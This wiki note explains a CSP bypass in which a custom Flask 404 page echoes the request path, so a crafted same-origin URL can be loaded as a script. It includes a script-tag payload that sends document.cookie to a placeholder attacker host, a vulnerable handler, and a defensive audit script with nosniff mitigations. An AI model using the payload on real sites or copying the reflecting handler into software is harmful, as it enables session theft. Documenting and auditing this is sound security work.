csp-bypass-custom-404
Bypass CSP when a custom 404 page is present
With:
resp.headers['Content-Security-Policy'] = "script-src 'self';"
And a custom 404 page like:
@app.errorhandler(404)
def page_not_found(error):
    # The request path is echoed back into the response body unchanged.
    path = request.path
    return f"{path} not found"
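It's possible to reflect JS in the same origin: the 404 body echoes the request path, so a crafted same-origin URL returns text that parses as JavaScript, and script-src 'self' accepts that URL as a script source. In the example below, the leading /ab.c/ is read as a regular-expression literal and the trailing // turns the appended " not found" into a comment.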
E.g.
<script src='ab.c/;fetch(`ATTACKER/${btoa(document.cookie)}`) //'>
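A way to audit error pages for this behaviour, as an added example that is not part of the original page: it checks whether a 404 body parses as JavaScript and whether X-Content-Type-Options: nosniff would stop a browser from running it. The function names, the simplified browser model and the '/no-such-page' path are assumptions made for illustration, and the script src from the page is assumed to resolve against the site root.

```javascript
// Added example (not from the original page): audit whether an error response
// could be loaded as a same-origin script under "script-src 'self'".

// MIME types a browser still accepts for scripts when nosniff is set (subset).
const JS_TYPES = new Set(['text/javascript', 'application/javascript',
  'application/ecmascript', 'text/ecmascript']);

// True if the text compiles as JavaScript. new Function() only parses; nothing runs.
function parsesAsScript(body) {
  try { new Function(body); return true; } catch (e) { return false; }
}

// The reflecting 404 body from the page, and the same body with HTML escaping.
const reflect = (path) => `${path} not found`;
const escapeHtml = (s) => s.replace(/[&<>"']/g, (c) => `&#${c.charCodeAt(0)};`);
const reflectEscaped = (path) => `${escapeHtml(path)} not found`;

// Simplified browser model (assumption): a response is a script gadget if its
// body parses as JavaScript and nosniff does not block its non-script MIME type.
function auditErrorResponse({ headers, body }) {
  const type = (headers['content-type'] || '').split(';')[0].trim().toLowerCase();
  const nosniff =
    (headers['x-content-type-options'] || '').trim().toLowerCase() === 'nosniff';
  const validJs = parsesAsScript(body);
  const blockedByNosniff = nosniff && !JS_TYPES.has(type);
  return { validJs, blockedByNosniff, scriptGadget: validJs && !blockedByNosniff };
}

// Request path taken from the page's <script src=...> example.
const PAGE_PATH = '/ab.c/;fetch(`ATTACKER/${btoa(document.cookie)}`) //';
const html = { 'content-type': 'text/html; charset=utf-8' };
const hardened = { ...html, 'x-content-type-options': 'nosniff' };

function runAudit() {
  return {
    ordinary: auditErrorResponse({ headers: html, body: reflect('/no-such-page') }),
    reflected: auditErrorResponse({ headers: html, body: reflect(PAGE_PATH) }),
    escaped: auditErrorResponse({ headers: html, body: reflectEscaped(PAGE_PATH) }),
    withNosniff: auditErrorResponse({ headers: hardened, body: reflect(PAGE_PATH) }),
    fixedBody: auditErrorResponse({ headers: hardened, body: 'Not found' }),
  };
}

console.log(runAudit());
```

HTML-escaping the path does not change the result because the reflected text contains none of the escaped characters. The error response stops being a script source when it is served with nosniff and a non-script content type, or when the path is not echoed at all.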
csp-bypass-custom-404.txt · Last modified: 2024/11/01 09:07 by osorin